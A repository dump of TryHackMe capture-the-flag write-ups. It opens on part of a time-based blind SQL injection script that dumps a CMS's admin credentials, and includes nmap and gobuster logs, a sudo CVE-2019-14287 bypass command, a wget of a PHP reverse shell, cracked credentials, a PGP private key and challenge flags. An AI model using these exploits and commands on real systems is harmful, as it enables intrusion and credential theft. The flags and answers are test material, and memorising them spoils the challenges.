")+from+cms_users" 111 | payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+" 112 | url = url_vuln + "&m1_idlist=" + payload 113 | start_time = time.time() 114 | r = session.get(url) 115 | elapsed_time = time.time() - start_time 116 | if elapsed_time >= TIME: 117 | flag = True 118 | break 119 | if flag: 120 | password = temp_password 121 | ord_password = ord_password_temp 122 | flag = True 123 | output += '\n[+] Password found: ' + password 124 | 125 | def dump_username(): 126 | global flag 127 | global db_name 128 | global output 129 | ord_db_name = "" 130 | ord_db_name_temp = "" 131 | while flag: 132 | flag = False 133 | for i in range(0, len(dictionary)): 134 | temp_db_name = db_name + dictionary[i] 135 | ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:] 136 | beautify_print_try(temp_db_name) 137 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+" 138 | url = url_vuln + "&m1_idlist=" + payload 139 | start_time = time.time() 140 | r = session.get(url) 141 | elapsed_time = time.time() - start_time 142 | if elapsed_time >= TIME: 143 | flag = True 144 | break 145 | if flag: 146 | db_name = temp_db_name 147 | ord_db_name = ord_db_name_temp 148 | output += '\n[+] Username found: ' + db_name 149 | flag = True 150 | 151 | def dump_email(): 152 | global flag 153 | global email 154 | global output 155 | ord_email = "" 156 | ord_email_temp = "" 157 | while flag: 158 | flag = False 159 | for i in range(0, len(dictionary)): 160 | temp_email = email + dictionary[i] 161 | ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:] 162 | beautify_print_try(temp_email) 163 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+" 164 | url = url_vuln + "&m1_idlist=" + payload 165 | start_time = time.time() 166 | r = session.get(url) 167 | elapsed_time = time.time() - start_time 168 | if elapsed_time >= TIME: 169 | flag = True 170 | break 171 | if flag: 172 | email = temp_email 173 | ord_email = ord_email_temp 174 | output += '\n[+] Email found: ' + email 175 | flag = True 176 | 177 | dump_salt() 178 | dump_username() 179 | dump_email() 180 | dump_password() 181 | 182 | if options.cracking: 183 | print colored("[*] Now try to crack password") 184 | crack_password() 185 | 186 | beautify_print() -------------------------------------------------------------------------------- /Simple CTF/exploit.txt: -------------------------------------------------------------------------------- 1 | python exploit.py --url http://10.10.99.100/simple/ --crack --wordlist /usr/share/wordlist/rockyou.txt -------------------------------------------------------------------------------- /Simple CTF/flag.txt: -------------------------------------------------------------------------------- 1 | W3ll d0n3. You made it! -------------------------------------------------------------------------------- /Simple CTF/gobuster.txt: -------------------------------------------------------------------------------- 1 | gobuster dir -u http://10.10.99.100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2 | =============================================================== 3 | Gobuster v3.0.1 4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart) 5 | =============================================================== 6 | [+] Url: http://10.10.99.100/ 7 | [+] Threads: 10 8 | [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 9 | [+] Status codes: 200,204,301,302,307,401,403 10 | [+] User Agent: gobuster/3.0.1 11 | [+] Timeout: 10s 12 | =============================================================== 13 | 2020/03/21 15:42:52 Starting gobuster 14 | =============================================================== 15 | /simple (Status: 301) 16 | Progress: 15351 / 220561 (6.96%)^C 17 | [!] Keyboard interrupt detected, terminating. 18 | =============================================================== 19 | 2020/03/21 15:48:42 Finished 20 | =============================================================== -------------------------------------------------------------------------------- /Simple CTF/nmap -p 1000 10.10.99.100.txt: -------------------------------------------------------------------------------- 1 | nmap -p 1000 10.10.99.100 2 | 3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 15:26 IST 4 | Nmap scan report for 10.10.99.100 5 | Host is up (0.22s latency). 6 | 7 | PORT STATE SERVICE 8 | 1000/tcp filtered cadlock -------------------------------------------------------------------------------- /Simple CTF/nmap -p 80 -A -v 10.10.99.100.txt: -------------------------------------------------------------------------------- 1 | nmap -p 80 -A -v 10.10.99.100 2 | 3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 15:36 IST 4 | 5 | PORT STATE SERVICE VERSION 6 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 7 | | http-methods: 8 | | Supported Methods: POST OPTIONS GET HEAD 9 | | http-robots.txt: 2 disallowed entries 10 | |/ /openemr-5_0_1_3 11 | |_http-server-header: Apache/2.4.18 (Ubuntu) 12 | |_http-title: Apache2 Ubuntu Default Page: It works 13 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 14 | Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%) 15 | No exact OS matches for host (test conditions non-ideal). 16 | Uptime guess: 11.537 days (since Tue Mar 10 02:42:47 2020) 17 | Network Distance: 2 hops 18 | TCP Sequence Prediction: Difficulty=261 (Good luck!) 19 | IP ID Sequence Generation: All zeros 20 | 21 | TRACEROUTE (using port 80/tcp) 22 | HOP RTT ADDRESS 23 | 1 226.68 ms 10.9.0.1 24 | 2 226.99 ms 10.10.99.100 -------------------------------------------------------------------------------- /Simple CTF/robots.txt: -------------------------------------------------------------------------------- 1 | http://10.10.99.100/robots.txt -------------------------------------------------------------------------------- /Simple CTF/ssh.txt: -------------------------------------------------------------------------------- 1 | ssh -p 2222 mitch@10.10.99.100 2 | The authenticity of host '[10.10.99.100]:2222 ([10.10.99.100]:2222)' can't be established. 3 | ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8. 4 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 5 | Warning: Permanently added '[10.10.99.100]:2222' (ECDSA) to the list of known hosts. 6 | mitch@10.10.99.100's password: 7 | Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686) 8 | 9 | * Documentation: https://help.ubuntu.com/ 10 | * Management: https://landscape.canonical.com/ 11 | * Support: https://ubuntu.com/advantage 12 | 13 | 0 packages can be updated. 14 | 0 updates are security updates. 15 | 16 | Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190 17 | $ ls 18 | user.txt 19 | $ cat user.txt 20 | G00d j0b, keep up! 21 | $ cd .. 22 | $ ls 23 | mitch sunbath 24 | $ sudo -l 25 | User mitch may run the following commands on Machine: 26 | (root) NOPASSWD: /usr/bin/vim -------------------------------------------------------------------------------- /Sudo Buffer Overflow/README.md: -------------------------------------------------------------------------------- 1 | # Sudo Buffer Overflow | https://tryhackme.com/room/sudovulnsbof 2 | 3 | ### [Task 2] Buffer Overflow 4 | 5 | ssh -p 4444 tryhackme@10.10.164.254 | Password : tryhackme 6 | 7 | ``` 8 | ssh -p 4444 tryhackme@10.10.164.254 9 | tryhackme@10.10.164.254's password: 10 | Last login: Thu Jun 18 03:30:09 2020 from 10.9.18.54 11 | tryhackme@sudo-bof:~$ ls 12 | exploit 13 | tryhackme@sudo-bof:~$ ./exploit 14 | [sudo] password for tryhackme: 15 | Sorry, try again. 16 | # 17 | # whoami 18 | root 19 | # id 20 | uid=0(root) gid=0(root) groups=0(root),1000(tryhackme) 21 | # cat /root/root.txt 22 | THM{buff3r_0v3rfl0w_rul3s} 23 | ``` 24 | 25 | #2 What's the flag in /root/root.txt? : `THM{buff3r_0v3rfl0w_rul3s}` 26 | -------------------------------------------------------------------------------- /Sudo Security Bypass/README.md: -------------------------------------------------------------------------------- 1 | # Sudo Security Bypass | https://tryhackme.com/room/sudovulnsbypass 2 | 3 | ### [Task 2] Security Bypass 4 | 5 | ssh -p 2222 tryhackme@10.10.170.166 6 | Password : tryhackme 7 | 8 | What can we run with sudo? : `sudo -l` 9 | 10 | #1 What command are you allowed to run with sudo? : `/bin/bash` 11 | 12 | CVE-2019-14287 : https://nvd.nist.gov/vuln/detail/CVE-2019-14287 13 | 14 | In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command. 15 | 16 | so, for root access : `sudo -u \#$((0xffffffff)) /bin/bash` 17 | 18 | #2 What is the flag in /root/root.txt? : `THM{l33t_s3cur1ty_bypass}` -------------------------------------------------------------------------------- /The Find Command/README.md: -------------------------------------------------------------------------------- 1 | # The Find Command | https://tryhackme.com/room/thefindcommand 2 | 3 | ### [Task 2] Be more specific 4 | 5 | #1 Find all files whose name ends with ".xml" : `find / -type f -name "*.xml"` 6 | 7 | #2 Find all files in the /home directory (recursive) whose name is "user.txt" (case insensitive) : `find /home -type f -iname "user.txt"` 8 | 9 | #3 Find all directories whose name contains the word "exploits" : `find / -type d -name "*exploits"` 10 | 11 | ### [Task 3] Know exactly what you're looking for 12 | 13 | #1 Find all files owned by the user "kittycat" : `find / -type f -user kittycat` 14 | 15 | #2 Find all files that are exactly 150 bytes in size : `find / -type f -size 150c` 16 | 17 | #3 Find all files in the /home directory (recursive) with size less than 2 KiB’s and extension ".txt" : `find /home -type f -size -2k -name "*.txt"` 18 | 19 | #4 Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format) : `find / -type f -perm 644` 20 | 21 | #5 Find all files that are only readable by anyone (use octal format) : `find / -type f -perm 444` 22 | 23 | #6 Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format) : `find / -type f -perm go=w -name "*.sh"` 24 | 25 | #7 Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format) : `find /usr/bin -type f -user root -perm /u=s` 26 | 27 | #8 Find all files that were not accessed in the last 10 days with extension ".png" : `find / -type f atime +10 -name "*.png"` 28 | 29 | #9 Find all files in the /usr/bin directory (recursive) that have been modified within the last 2 hours : `find /usr/bin -type f -mmin +120` -------------------------------------------------------------------------------- /TomGhost/README.md: -------------------------------------------------------------------------------- 1 | TomGhost | https://tryhackme.com/room/tomghost 2 | 3 | [Task 1] Flags 4 | 5 | Are you able to complete the challenge? 6 | 7 | #1 Compromise this machine and obtain user.txt : ```THM{GhostCat_1s_so_cr4sy}``` 8 | 9 | #2 Escalate privileges and obtain root.txt : ```THM{Z1P_1S_FAKE}``` 10 | -------------------------------------------------------------------------------- /TomGhost/credential.pgp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/TomGhost/credential.pgp -------------------------------------------------------------------------------- /TomGhost/creds_merlin: -------------------------------------------------------------------------------- 1 | merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j 2 | -------------------------------------------------------------------------------- /TomGhost/creds_skyfuck: -------------------------------------------------------------------------------- 1 | skyfuck:8730281lkjlkjdqlksalks 2 | -------------------------------------------------------------------------------- /TomGhost/flag.txt: -------------------------------------------------------------------------------- 1 | User : THM{GhostCat_1s_so_cr4sy} 2 | 3 | Root : THM{Z1P_1S_FAKE} 4 | -------------------------------------------------------------------------------- /TomGhost/hash: -------------------------------------------------------------------------------- 1 | tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme ::tryhackme.asc 2 | -------------------------------------------------------------------------------- /TomGhost/nmap_10.10.18.28.txt: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Thu Apr 23 19:25:24 2020 as: nmap -sC -sS -sV -A -O -oN nmap_10.10.156.180.txt 10.10.156.180 2 | Nmap scan report for 10.10.156.180 3 | Host is up (0.29s latency). 4 | Not shown: 996 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) 9 | | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) 10 | |_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519) 11 | 53/tcp open tcpwrapped 12 | 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 13 | | ajp-methods: 14 | |_ Supported methods: GET HEAD POST OPTIONS 15 | 8080/tcp open http Apache Tomcat 9.0.30 16 | |_http-favicon: Apache Tomcat 17 | |_http-title: Apache Tomcat/9.0.30 18 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 19 | TCP/IP fingerprint: 20 | OS:SCAN(V=7.80%E=4%D=4/23%OT=22%CT=1%CU=40412%PV=Y%DS=2%DC=T%G=Y%TM=5EA19E7 21 | OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)SEQ 22 | OS:(SP=109%GCD=1%ISR=109%TI=Z%CI=I%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O 23 | OS:3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=68DF%W2= 24 | OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M54DNNSN 25 | OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D 26 | OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O 27 | OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W 28 | OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R 29 | OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 30 | 31 | Network Distance: 2 hops 32 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 33 | 34 | TRACEROUTE (using port 3389/tcp) 35 | HOP RTT ADDRESS 36 | 1 264.02 ms 10.9.0.1 37 | 2 332.70 ms 10.10.156.180 38 | 39 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 40 | # Nmap done at Thu Apr 23 19:26:15 2020 -- 1 IP address (1 host up) scanned in 51.49 seconds 41 | -------------------------------------------------------------------------------- /TomGhost/tryhackme.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP PRIVATE KEY BLOCK----- 2 | Version: BCPG v1.63 3 | 4 | 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 80 | kG6wLdznOpe4zaLA/vM= 81 | =dMrv 82 | -----END PGP PRIVATE KEY BLOCK----- 83 | -------------------------------------------------------------------------------- /TryHackMe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/TryHackMe.png -------------------------------------------------------------------------------- /Vulnversity/Python PTY.txt: -------------------------------------------------------------------------------- 1 | python -c 'import pty;pty.spawn("/bin/bash")'; -------------------------------------------------------------------------------- /Vulnversity/README.md: -------------------------------------------------------------------------------- 1 | # Vulnversity | https://tryhackme.com/room/vulnversity 2 | 3 | ### [Task 2] Reconnaissance 4 | 5 | #2 Scan the box, how many ports are open? : ```6``` 6 | 7 | #3 What version of the squid proxy is running on the machine? : ```3.5.12``` 8 | 9 | #4 How many ports will nmap scan if the flag -p-400 was used? : ```400``` 10 | 11 | #5 Using the nmap flag -n what will it not resolve? : ```DNS``` 12 | 13 | #6 What is the most likely operating system this machine is running? : ```Ubuntu``` 14 | 15 | #7 What port is the web server running on? : ```3333``` 16 | 17 | ### [Task 3] Locating directories using GoBuster 18 | 19 | #2 What is the directory that has an upload form page? : ```/internal/``` 20 | 21 | ### [Task 4] Compromise the webserver 22 | 23 | #1 Try upload a few file types to the server, what common extension seems to be blocked? : ```.php``` 24 | 25 | #3 what extension is allowed? : ```.phtml``` 26 | 27 | #5 What user was running the web server? : ```bill``` 28 | 29 | #6 What is the user flag? : ```8bd7992fbe8a6ad22a63361004cfcedb``` 30 | 31 | ### [Task 5] Privilege Escalation 32 | 33 | #1 On the system, search for all SUID files. What file stands out? : ```/bin/systemctl``` 34 | 35 | #2 Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt) : ```a58ff8579f0a9270368d33a9966c7fd5``` 36 | -------------------------------------------------------------------------------- /Vulnversity/gobuster.txt: -------------------------------------------------------------------------------- 1 | gobuster dir -u http://10.10.15.205:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 1 ↵ 2 | =============================================================== 3 | Gobuster v3.0.1 4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart) 5 | =============================================================== 6 | [+] Url: http://10.10.15.205:3333/ 7 | [+] Threads: 10 8 | [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 9 | [+] Status codes: 200,204,301,302,307,401,403 10 | [+] User Agent: gobuster/3.0.1 11 | [+] Timeout: 10s 12 | =============================================================== 13 | 2020/03/21 16:45:52 Starting gobuster 14 | =============================================================== 15 | /images (Status: 301) 16 | /css (Status: 301) 17 | /js (Status: 301) 18 | /fonts (Status: 301) 19 | /internal (Status: 301) 20 | Progress: 5298 / 220561 (2.40%)^C 21 | [!] Keyboard interrupt detected, terminating. 22 | =============================================================== 23 | 2020/03/21 16:47:55 Finished 24 | =============================================================== -------------------------------------------------------------------------------- /Vulnversity/php-reverse-shell.txt: -------------------------------------------------------------------------------- 1 | wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -------------------------------------------------------------------------------- /Vulnversity/root.txt: -------------------------------------------------------------------------------- 1 | root@vulnuniversity:/root# ls 2 | ls 3 | root.txt 4 | root@vulnuniversity:/root# cat root.txt 5 | cat root.txt 6 | a58ff8579f0a9270368d33a9966c7fd5 7 | root@vulnuniversity:/root# -------------------------------------------------------------------------------- /Vulnversity/shell.tar.xz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Vulnversity/shell.tar.xz -------------------------------------------------------------------------------- /Vulnversity/suid.txt: -------------------------------------------------------------------------------- 1 | ./bin/su 2 | ./bin/ntfs-3g 3 | ./bin/mount 4 | ./bin/ping6 5 | ./bin/umount 6 | ./bin/systemctl 7 | ./bin/ping 8 | ./bin/fusermount -------------------------------------------------------------------------------- /Vulnversity/user.txt: -------------------------------------------------------------------------------- 1 | $ ls 2 | bill 3 | $ cd bill 4 | $ ls 5 | user.txt 6 | $ cat user.txt 7 | 8bd7992fbe8a6ad22a63361004cfcedb -------------------------------------------------------------------------------- /Welcome To TryHackMe/README.md: -------------------------------------------------------------------------------- 1 | # Welcome To TryHackMe | https://tryhackme.com/room/tutorial 2 | 3 | ### [Task 1] Structured Learning Through Tasks 4 | 5 | #1 What protocol does the World Wide Web Use? : `http` 6 | 7 | #2 What port does HTTPS commonly run on? : `443`a 8 | -------------------------------------------------------------------------------- /WgelCTF/README.md: -------------------------------------------------------------------------------- 1 | # Wget CTF | https://tryhackme.com/room/wgelctf 2 | 3 | ### [Task 1] Wgel CTF 4 | 5 | #1 User flag : 057c67131c3d5e42dd5cd3075b198ff6 6 | 7 | #2 Root flag : b1b968b37519ad1daa6408188649263d 8 | 9 | 10 